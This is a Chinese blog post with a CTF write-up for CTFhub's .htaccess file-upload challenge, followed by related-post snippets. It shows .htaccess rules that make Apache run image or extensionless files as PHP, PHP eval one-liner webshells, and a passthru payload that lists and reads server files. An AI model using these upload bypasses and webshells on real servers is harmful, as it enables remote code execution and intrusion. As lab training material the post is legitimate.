【CTF整理】CTFhub技能树-Web-文件上传-.htaccess

最新推荐文章于 2025-03-30 13:31:59 发布
最新推荐文章于 2025-03-30 13:31:59 发布
阅读量3.4k 收藏 19
点赞数 7
分类专栏: CTF相关 文章标签: web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42742658/article/details/106132770
版权
本文分享在CTFhub平台解决Web文件上传挑战的经验,详细解析使用.htaccess进行文件上传及利用PHP passthru()函数获取Flag的过程,强调动手实践的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

【CTF整理】CTFhub技能树-Web-文件上传-.htaccess

CTFhub技能树里面的题最近做了一些,但是除了之前的SQL注入之外,其他的我实在没什么兴趣整理,毕竟网上的整理出来的博主很多,之所以专门整理这个文件上传.htaccess的题目,是因为我踩坑了,本以为一道简单的题目我就这么硬生生的踩进去了,还差点没出来,浪费了不少金币啊。看别的博主都是上传.htaccess文件,上传修改后缀的一句话木马,菜刀或是蚁剑一连就getshell了,简单的不能再简单,为毛我试了N次都是不行?试了各种形式的.htaccess文件,各种报错。网上如此轻易用蚁剑连上的博主,我是不知道怎么做到的(可能是我菜逼吧,不过网上好像就一两个版本,严重怀疑是最开始的那一篇带偏一堆人) 。吐槽结束,记坑。

1、常规思路

修改.htaccess文件,上传指定后缀名的一句话,菜刀连接getshell。------ 失败

基本上就这样
在这里插入图片描述

我试过的.htaccess内容:
版本1
<FilesMath  ".jpg">
SetHandler application/x-httpd-php
</FilesMatch>


版本2
AddType application/x-httpd-php .jpg


配合PHP各种一句话文件后缀.jpg,
<?php eval($_PTST['c']);?>
<?php eval($_GET['c']);?>
<?php @eval($_PTST['c']);?>
<?php @eval($_GET['c']);?>
<?php eval($_PTST["c"]);?>
<?php eval($_GET["c"]);?>
<?php @eval($_PTST["c"]);?>
<?php @eval($_GET["c"]);?>


亲测,菜刀蚁剑没有一个能正常连接,要么200ok啥都不显示或者显示一句话,连不上,要么直接404,还有500的。

这种思路就是网上最流行的思路,想看的小伙伴可以看这里
https://www.cnblogs.com/anweilx/p/12523582.html

2、PHP passthru()函数

这个方法不需要菜刀,蚁剑什么,弱爆了,直接浏览器访问就看到了flag好吗,给想出这个方法的大佬点赞。
PHP的passthru()这个函数可以直接执行外部命令,用法passthru" ls "),同样有此功能的函数还有
exec()、system()、 shell_exec()等。

解法
这里先写一个.htaccess文件上传

<FilesMatch "sj">  //sj随便写的,后面上传的文件没有后缀,就叫sj
 SetHandler application/x-httpd-php
</FilesMatch>

然后写sj文件内容如下:

<?php 
#passthru("ls /var/www/html/"); //第一次只写这一行,用来找flag文件在哪里
passthru("cat /var/www/html/flag_229326633.php");//第二次是找到了flag文件之后,直接读取内容
?>

上传sj文件,然后浏览器直接访问文件:
在这里插入图片描述这里啥都没有,需要查看源码。(小坑小坑)
在这里插入图片描述得到flag

总结:
有时候不要太依赖菜刀蚁剑之类的工具,不一定要一句话,我们还可以直接执行外部命令查看,PHP常见可以用来执行外部命令的函数有 passthru()、exec()、system()、 shell_exec()等。(不要太相信网上的解法,自己多动手尝试)

by 久违 2020.5.15 夜

ctfhub-web-文件上传
m0_52484587的博客
08-28 999
● 一般来说,配置文件的作用范围都是全局的,但Apache提供了一种很方便的、可作用于当前目录及其子目录的配置文件——.htaccess(分布式配置文件),● 提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。● 是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。只能上传.jpg,.png,.gif三种格式的文件,前端上传jpg,修改数据包进行上传。
CTFHub技能树web文件上传(一)
wzhwzh123321的博客
02-15 1439
使用蚁剑连接,上传的.htaccess文件文件名字只能是.htaccess,只能有后缀而不能有文件的名,比如1.htaccess等,在第一次上传中我使用了1.htaccess,在后续上传jpg格式文件后服务器没有自动将jpg解析为php文件,需要注意。JavaScript会对我们上传的文件进行限制,允许图片格式上传,可以通过上传图片马或者使用bp修改一下文件后缀即可,本题使用bp修改文件后缀的方法,先将文件后缀修改为.jpg格式,文件上传然后抓包。文件上传目录权限:确保上传目录的适当权限设置非常重要。
CTFHub技能树web文件上传.htaccess
qq_53148935的博客
04-04 854
注:本人第一次写博客,主要是为了记录解题过程,如有不足之处,欢迎指出,但勿喷。 这几天开始做了些ctfhub技能树里面的题目,因为我们这学期开始学了一些web攻防的内容,然后就想着去ctfhub练练技能,话不多说,我们直接进入解题过程。 先看看题目 这里给了些提示内容,说htaccess文件是apache的一个配置文件之类的,有兴趣可以自行百度了解一下。在这题里面,htaccess文件的作用就是让别的文件以你指定的方式运行,如.txt文件可以以.php文件的形式运行。 了解了这些之后我们就会有一
5分钟带你入门—CTFHub技能树(最详细教程)
最新发布
2201_75642447的博客
03-30 802
CTF(CaptureTheFlag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为“Flag”。
.htaccess文件上传CTF讲解
hxhxhxhxx的博客
07-06 3796
.htaccess文件上传CTF详解题目解法方法2 题目 解法 我们先写一个htaccess文件 通过它调用php解析器去解析一个文件名中只要包含"haha"这个字符串的任意文件,无论扩展名是什么(没有也行),都会以php的方式来解析 <FilesMatch "haha"> SetHandler application/x-httpd-php </FilesMatch> 或者如下,上传一个文件名为evil.gif的图片马: <FilesMatch "evil.gi
CTFHUB-web-文件上传
ookami6497的博客
12-02 718
CTFHub-Web-文件上传
IceCream的博客
05-01 2594
1.编写一段PHP木马脚本2.将编写好的木马进行上传3.显示上传成功了4.使用文件上传工具进行尝试5.连接成功进入文件管理6.上翻目录找到flag文件7.打开文件查看flag。
CTFHub技能树 Web-文件上传 详解
weixin_45808483的博客
11-15 3076
无验证 启动环境 我们上传一句话木马 <?php @eval($_POST['shell']);?> 提示了相对路径, 我们直接使用蚁剑连接。 找到flag。 前端验证 上传php文件,前端校验不允许上传php文件 审计代码,只允许上传图片类型 我们先将后缀改为 .jpg 上传成功 再通过burp抓包,修改filename="1.php"和Content-Type: php 发送数据包,页面显示上传成功 使用蚁剑连接 成...
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7820
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CtfHub-wp(web
01-23
本文主要探讨了CTF(Capture The Flag)竞赛中与Web安全相关的知识点,通过解决一系列问题,我们可以学习到如何发现和利用网站的漏洞获取关键信息。首先,提到了通过查找网站的备份文件来获取线索,例如在URL后添加...
CtfHub-web-文件上传
BROTHERYY的博客
05-10 687
1.无验证 直接传,蚁剑连得flag 得到flag。 2.前端验证 这里直接把一句话的后缀改为jpg,然后再抓包修改后缀。 成功得到flag。 3.htaccess 首先编辑.htaccess文件 这里是意思以php解析含有1的文件名,然后现在上传图片 得到flag。 4.MIME验证 将修改后的包丢rapeater,send 连接后得到flag。 5.文件头检查 首先制作图片马,图片可以自己用画图工具随便画一个。 然后上传抓包,改后缀,repeater 得到flag。 6.00截断
CTFHub-web(文件上传)
qq_49502930的博客
12-05 3162
文章目录无验证前端验证.htaccessMIME绕过00截断 无验证 我们打开关卡,上传一句话木马程序 <?php @eval($_POST['shell']);?> 提交成功,显示相对路径 打开蚁剑连接测试 打开flag文件即可成功获得flag。 前端验证 上传时显示不可上传 提示为前端验证,我们打开页面源代码查看 将一句话木马后缀改为jpg格式上传,然后用burp抓包修改 将文件后缀改为php,然后上传类型也改为php 用蚁剑连接测试 打开文件,得到flag .htaccess
CTFHubWeb文件上传
qq_45927819的博客
07-27 1789
文章目录无验证前端验证.htaccess方法一方法二MIME绕过文件头检查00截断 无验证 没什么限制,直接一句话木马 <?php @eval($_POST['upload']);?> 提交成功! 并且提示了文件的相对路径,那我们可以直接使用蚁剑或者菜刀连接 打开便可以得到flag! 前端验证 既然是前端js验证,那我们尝试用burpsuite抓包 上题写的一句话木马还可以接着用,但是我们要将他的后缀改成png或者jpg,抓包: forward放包,上传成功!提示了文件路径,蚁剑连接
CTFHUB——web——文件上传
weixin_45664911的博客
09-22 762
无验证 根据题目“无验证”可知,对上传文件没有进行任何验证 上传一句话木马,再用蚁剑进行连接 <?php @eval($_POST['a'] ?> 其中post的值可以随意更改 在地址后面添加上传文件相对路径,密码是post的值 连接 ...
CTFHub_技能树_Web文件上传——“.htaccess
Ho1aAs‘s Blog
07-24 1888
文章目录使用工具.htaccess文件解题过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 中国蚁剑 .htaccess文件 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。 ——百度百科 通过编辑.htaccess文件将特定后缀的文件解析为PHP执行 解
Ctfhub解题 web 文件上传
weixin_46703850的博客
03-20 625
Ctfhub解题 web XSS反射型1.无验证2.前端验证3. .htaccess方法一:方法二:方法三: 介绍:记录解题过程 1.无验证 编写PHP一句话木马 <?php echo "上传成功"; eval($_POST['cmd']); ?> 无验证直接上传 回显 上传文件相对路径 upload/shell.php 使用蚁剑 得到flag <?php // ctfhub{c1a224871866a2b954019c3a} 2.前端验证 上传代码:
CTFHub-Web-文件上传练习
Atkx's Blog
11-22 2240
无验证 上传一句话木马1.php <?php @eval($_POST["pass"]);?> 上传文件相对路径upload/1.php 使用蚁剑连接,连接密码为pass 查看目录,flag就在这里 前端验证 上传一句话木马,结果提示该文件不允许上传 题目是前端验证,直接查看网页源代码,发现只能上传.jpg,.png,.gif三种格式的文件 把1.php改为1.jpg,然后上传抓包 1.jpg再改为1.php,然后放包 上传成功,得到相对路径upload/1.php 还
CTFHub技能树.Web.文件上传题解
qq_45716477的博客
04-25 714
目录题目0x00 原理0x01 无验证0x02 前端验证0x03 .htaccess0x04 MIME绕过0x05 00截断0x06 双写后缀0x07 文件头检查 题目 0x00 原理 在存在文件上传的网页中上传带有恶意代码的文件并让此代码被执行,完成我们想要做的事。在这里,可以考虑上传一句话木马。 0x01 无验证 0x02 前端验证 0x03 .htaccess 0x04 MIME绕过 0x05 00截断 0x06 双写后缀 0x07 文件头检查 ...
CTFHUB-文件上传.htaccess文件利用
ITgougou_的博客
12-15 518
网上找了一下什么是.htaccess文件 首先我们先上传一个.htaccess文件,文件内容如下 SetHandler application/x-httpd-php 这段内容的作用是使所有的文件都会被解析为php文件 这里上传一个jpg文件,内容为一句话木马 蚁键连接,获得webshell ...
ctfhub .htaccess文件上传 报500错误
02-13
### CTFHub平台上.htaccess文件上传导致500错误解决方案 当遇到CTFHub平台上的`.htaccess`文件上传引发的500内部服务器错误时,通常是因为Apache配置不当或存在语法错误所致[^1]。 #### Apache日志分析 为了诊断具体原因,应当查看Apache的日志文件。这些日志可以提供关于为何发生500错误的具体线索。一般情况下,在Linux系统上,默认路径位于 `/var/log/apache2/error.log` 或者 `/var/log/httpd/error_log` 中。通过检查最近条目中的警告和错误消息来定位问题所在[^2]。 #### 配置验证 确保本地测试环境下的Apache版本与目标服务器一致,并尝试加载相同的 `.htaccess` 文件以重现此问题。如果确实出现了同样的500错误,则可能是由于该文件内的指令不被当前使用的Apache模块支持所引起。此时应仔细核对每一条规则并查阅官方文档确认其兼容性和正确性[^3]。 #### 权限设置 另一个常见的原因是权限不足。即使语法完全无误,但如果Web服务器进程无法读取到这个隐藏文件的话也会报错。因此要保证 `.htaccess` 及其所在的目录具有适当的所有权以及755 (rwxr-xr-x) 的访问模式[^4]。 ```bash chmod 755 /path/to/directory/.htaccess chown www-R ``` 以上命令假设运行的是基于Debian系的操作系统;对于其他发行版可能需要调整用户组名称。 #### PHP解析器冲突 有时PHP脚本试图处理非预期类型的请求也可能触发此类异常情况。特别是当涉及到动态内容生成的时候更应该注意这一点。可以通过禁用不必要的处理器或将特定扩展名排除在外的方式来规避潜在的风险[^5]。 ```apacheconf <FilesMatch "\.(php|phtml)$"> SetHandler application/x-httpd-php </FilesMatch> ``` 上述代码片段展示了如何仅允许指定后缀名由PHP引擎解释执行的方法之一。
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

久违 °

小菜鸟就要使劲飞

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值